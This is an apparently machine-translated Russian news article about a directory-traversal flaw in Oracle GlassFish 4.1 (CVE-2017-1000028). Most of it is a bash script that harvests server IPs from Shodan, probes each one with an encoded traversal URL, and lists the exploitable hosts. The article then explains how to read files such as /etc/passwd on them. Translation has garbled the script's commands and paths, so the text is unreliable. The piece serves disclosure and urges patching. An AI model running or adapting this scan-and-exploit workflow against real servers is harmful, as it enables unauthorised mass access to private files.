Уязвимость в GlassFish Oracle: Исследователь безопасности Димитрис Руссис анализирует нас как уязвимость к известным Сервер приложений Его GlassFish Oracle признан CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) в настоящее время предоставляет данные тысячам серверов по всему миру.
Его эксплуатация вакуум безопасности позволяет читать тип атаки по каталогам всех файлов сервера, на которых установлен сервер приложений.
В анализе, проведенном исследователем, они сначала используют образцы серверов 300 через поисковую систему shodan, на которой установлена версия GlashFish в версии 4.1.
Затем с помощью автоматизированного сценария, созданного исследователем, они проверяют, какой из серверов действительно существует. уязвимость.
#! / bin / bash # Получите 300 результатов от поисковой системы Shodan shodan search --limit 300 --fields ip_str GlassFish 4.1 port: 4848> servers_ip.txt # Сортировка IP cat servers_ip.txt | сорт -n -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt # Удалить все пробелы sed -r 's / \ s + // g' servers_sort.txt> servers.txt # Удалить временное Файлы rm servers_ip.txt rm servers_sort.txt # Список серверов input = "servers.txt" # Проверить сервер на уязвимость, пока IFS = read -r line do ip = $ line # http: // server_ip / theme / META-INF / ../../../../../../../../../../ url = "http: // $ line: 4848 / theme / META-INF /% c0 % ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae % c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0% ae% c0% af% c0% ae% c0 % ae% c0% af% c0% ae% c0% ae% c0% af "echo -n" ip: $ line "fetch =` curl -s -o / dev / null --max-time 5 -w "% {http_code} "$ url`; if [$ fetch = 200] then echo "- Соединение успешно! Сервер уязвим" # Сохранить результат в weak_servers.txt echo "$ url" >> уязвимый_servers.txt else echo "- Соединение не удалось! Сервер не уязвим" fi done < "$ input"
Конечным результатом скрипта является создание файла, содержащего ссылки (URL-адреса) немедленно использовать уязвимость.
Просматривая ссылки, включенные в файл браузер мы можем видеть все файлы в / корне Сервера.
Иллюстрация:
Windows сервер
Linux сервер
Теперь мы можем получить доступ к любому файлу, который хотим на сервере, добавив путь к файлу в конце URL-адреса.
Например,
/ и т.д./ passwd
/ Корень
Вышеупомянутое исследование демонстрирует, с одной стороны, что уязвимость может привести к раскрытию данных в широком масштабе во всем мире, а с другой стороны, необходимость немедленного внедрения обновления программного обеспечения Системными администраторами.
Редакция SecNews искренне благодарит исследователя Димитриоса Руссиса за достоверную и своевременную информацию.
* Димитрис Руссис - сотрудник Лаборатории безопасности информационных систем Эгейского университета.
http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652